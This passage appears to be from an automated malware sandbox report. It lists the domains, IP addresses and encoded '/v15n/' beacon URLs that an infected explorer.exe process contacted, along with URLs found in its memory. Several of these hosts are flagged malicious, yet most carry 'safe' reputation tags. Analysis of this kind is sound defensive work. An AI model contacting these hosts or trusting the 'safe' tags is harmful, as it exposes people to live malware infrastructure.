              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark0%Avira URL Cloudsafe
              http://www.wordcraftart.fun/v15n/www.suv.xyz0%Avira URL Cloudsafe
              http://www.boostgrowmode.comReferer:0%Avira URL Cloudsafe
              http://www.y7rak9.comReferer:0%Avira URL Cloudsafe
              http://www.syedlatief.com/v15n/0%Avira URL Cloudsafe
              http://www.mirotcg.info/v15n/0%Avira URL Cloudsafe
              http://www.hacks.digital0%Avira URL Cloudsafe
              http://www.boostgrowmode.com/v15n/www.syedlatief.com0%Avira URL Cloudsafe
              http://www.hacks.digitalReferer:0%Avira URL Cloudsafe
              http://www.creativelyloud.com/v15n/0%Avira URL Cloudsafe
              https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%Avira URL Cloudsafe
              https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the0%Avira URL Cloudsafe
              http://www.creativelyloud.com/v15n/?sr=3q+gD+8d2JqJcaFj8j5bP1Jm3mKwB6TbJO3aLoAeIjtgFnwNom6OyZtNSFOdFVlOxo+Q&JRv=XrEdp4JX0%Avira URL Cloudsafe
              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg0%Avira URL Cloudsafe
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA0%Avira URL Cloudsafe
              https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin0%Avira URL Cloudsafe
              http://www.brunoduarte.online/v15n/0%Avira URL Cloudsafe
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark0%Avira URL Cloudsafe
              https://api.msn.com/v1/news/Feed/Windows?0%Avira URL Cloudsafe
              http://www.lawyers-br-pt-9390663.fyi0%Avira URL Cloudsafe
              http://www.suv.xyz/v15n/0%Avira URL Cloudsafe
              http://www.lawyers-br-pt-9390663.fyi/v15n/0%Avira URL Cloudsafe
              http://www.y7rak9.com/v15n/0%Avira URL Cloudsafe
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT0%Avira URL Cloudsafe
              http://www.kurainu.xyzReferer:0%Avira URL Cloudsafe
              www.gtur.top/v15n/0%Avira URL Cloudsafe
              http://www.gtur.topReferer:0%Avira URL Cloudsafe
              https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/0%Avira URL Cloudsafe
              http://www.wordcraftart.fun0%Avira URL Cloudsafe
              https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi0%Avira URL Cloudsafe
              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg0%Avira URL Cloudsafe
              https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b0%Avira URL Cloudsafe
              http://www.mirotcg.info/v15n/www.mxrkpkngishbdss.xyz0%Avira URL Cloudsafe
              https://wns.windows.com/EM00%Avira URL Cloudsafe
              https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt0%Avira URL Cloudsafe
              http://www.creativelyloud.comReferer:0%Avira URL Cloudsafe
              http://www.brunoduarte.onlineReferer:0%Avira URL Cloudsafe
              http://www.wordcraftart.funReferer:0%Avira URL Cloudsafe
              http://www.y7rak9.com0%Avira URL Cloudsafe
              https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it0%Avira URL Cloudsafe
              http://www.brunoduarte.online/v15n/www.kedai168ef.com0%Avira URL Cloudsafe
              http://www.mirotcg.infoReferer:0%Avira URL Cloudsafe
              http://www.mxrkpkngishbdss.xyz0%Avira URL Cloudsafe
              http://www.syedlatief.com0%Avira URL Cloudsafe
              https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI090%Avira URL Cloudsafe
              http://www.kedai168ef.com0%Avira URL Cloudsafe
              http://www.fwbsmg.lifeReferer:0%Avira URL Cloudsafe
              https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al0%Avira URL Cloudsafe
              http://www.suv.xyz/v15n/www.mirotcg.info0%Avira URL Cloudsafe
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k0%Avira URL Cloudsafe
              http://www.kedai168ef.com/v15n/0%Avira URL Cloudsafe
              http://ns.adobeS0%Avira URL Cloudsafe
              http://www.bt365851.com/v15n/0%Avira URL Cloudsafe
              http://www.gtur.top/v15n/www.fwbsmg.life0%Avira URL Cloudsafe
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark0%Avira URL Cloudsafe
              http://www.hacks.digital/v15n/www.creativelyloud.com0%Avira URL Cloudsafe
              http://www.mirotcg.info0%Avira URL Cloudsafe
              http://www.gtur.top0%Avira URL Cloudsafe
              http://www.syedlatief.com/v15n/www.gtur.top0%Avira URL Cloudsafe
              http://www.boostgrowmode.com0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.hacks.digital
              		209.196.146.115
              		truetrue
                		unknown
                mirotcg.info
                		3.33.130.190
                		truetrue
                  		unknown
                  www.wordcraftart.fun
                  		170.39.213.118
                  		truetrue
                    		unknown
                    parkingpage.namecheap.com
                    		91.195.240.19
                    		truetrue
                      		unknown
                      www.suv.xyz
                      		3.64.163.50
                      		truetrue
                        		unknown
                        msdklf.dsaf.apkdowncdn.com
                        		206.119.184.155
                        		truetrue
                          		unknown
                          syedlatief.com
                          		162.241.244.34
                          		truetrue
                            		unknown
                            www.gtur.top
                            		206.238.13.219
                            		truetrue
                              		unknown
                              ssl1.prod.systemdragon.com
                              		104.18.187.223
                              		truetrue
                                		unknown
                                pixie.porkbun.com
                                		44.227.65.245
                                		truetrue
                                  		unknown
                                  www.mxrkpkngishbdss.xyz
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.lawyers-br-pt-9390663.fyi
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.syedlatief.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.creativelyloud.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.boostgrowmode.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.mirotcg.info
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.y7rak9.com
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.wordcraftart.fun/v15n/?JRv=XrEdp4JX&sr=90AMgQB2NDTL00GN4iM7gX4woUZ3upfO9yCtQrIdbfLXDlf/PtDiDRZV6/VBSbbmWq2Jtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.suv.xyz/v15n/?sr=vAzU6JYnADLUgEemxRzkUQMY3qynAzl+X72N7mZcinpf+VhfhGS/tUhrfESL21IfICFO&JRv=XrEdp4JXtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.creativelyloud.com/v15n/?sr=3q+gD+8d2JqJcaFj8j5bP1Jm3mKwB6TbJO3aLoAeIjtgFnwNom6OyZtNSFOdFVlOxo+Q&JRv=XrEdp4JXtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.mirotcg.info/v15n/?JRv=XrEdp4JX&sr=eKJokfhRlZ6TJn38gns6VD6cymqx2Da3HErd8WBjDQDJ0kZiIGavcwgaXT3T04xjS0autrue
                                                  		unknown
                                                  www.gtur.top/v15n/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.y7rak9.com/v15n/?sr=3ADokGHGfx6TKsz50QsuRVYX3rGFBDL5q/42DkYvURdCZMVWG44MA4Ku4Cx/hAPmB3dD&JRv=XrEdp4JXtrue
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://powerpoint.office.comerexplorer.exe, 00000004.00000002.3832766663.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://android.notify.windows.com/iOSA4explorer.exe, 00000004.00000002.3833528004.000000000BCC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BCB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285667724.000000000BCBF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000004.00000000.1397007516.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3826801349.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fwbsmg.lifeexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.lawyers-br-pt-9390663.fyiReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.bt365851.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://excel.office.comexplorer.exe, 00000004.00000002.3832766663.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.kurainu.xyz/v15n/www.y7rak9.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.syedlatief.comReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.wordcraftart.fun/v15n/explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.kurainu.xyzexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.mxrkpkngishbdss.xyz/v15n/explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.creativelyloud.com/v15n/www.kurainu.xyzexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.lawyers-br-pt-9390663.fyi/v15n/www.boostgrowmode.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.brunoduarte.onlineexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.y7rak9.com/v15n/www.wordcraftart.funexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.microsoft.cexplorer.exe, 00000004.00000002.3827556743.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076522967.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.boostgrowmode.com/v15n/explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://android.notify.windows.com/iOSdexplorer.exe, 00000004.00000002.3833528004.000000000BCC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BCB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285667724.000000000BCBF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.kedai168ef.com/v15n/www.bt365851.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mxrkpkngishbdss.xyzReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.creativelyloud.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.suv.xyzReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.mxrkpkngishbdss.xyz/v15n/www.lawyers-br-pt-9390663.fyiexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.wordcraftart.fun/v15n/www.suv.xyzexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.boostgrowmode.comReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mirotcg.info/v15n/explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://outlook.comexplorer.exe, 00000004.00000002.3832766663.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.y7rak9.comReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.syedlatief.com/v15n/explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.hacks.digitalexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.hacks.digitalReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.boostgrowmode.com/v15n/www.syedlatief.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.creativelyloud.com/v15n/explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000004.00000002.3833528004.000000000BCC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BCB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285667724.000000000BCBF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000004.00000002.3833528004.000000000BCC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BCB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285667724.000000000BCBF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.brunoduarte.online/v15n/explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000004.00000002.3826801349.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.lawyers-br-pt-9390663.fyiexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.lawyers-br-pt-9390663.fyi/v15n/explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.suv.xyz/v15n/explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.y7rak9.com/v15n/explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.gtur.topReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.kurainu.xyzReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.wordcraftart.funexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.microexplorer.exe, 00000004.00000000.1391014602.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3825259547.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1394973187.0000000007710000.00000002.00000001.00040000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mirotcg.info/v15n/www.mxrkpkngishbdss.xyzexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://wns.windows.com/EM0explorer.exe, 00000004.00000000.1406109687.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.brunoduarte.onlineReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.creativelyloud.comReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.wordcraftart.funReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.y7rak9.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
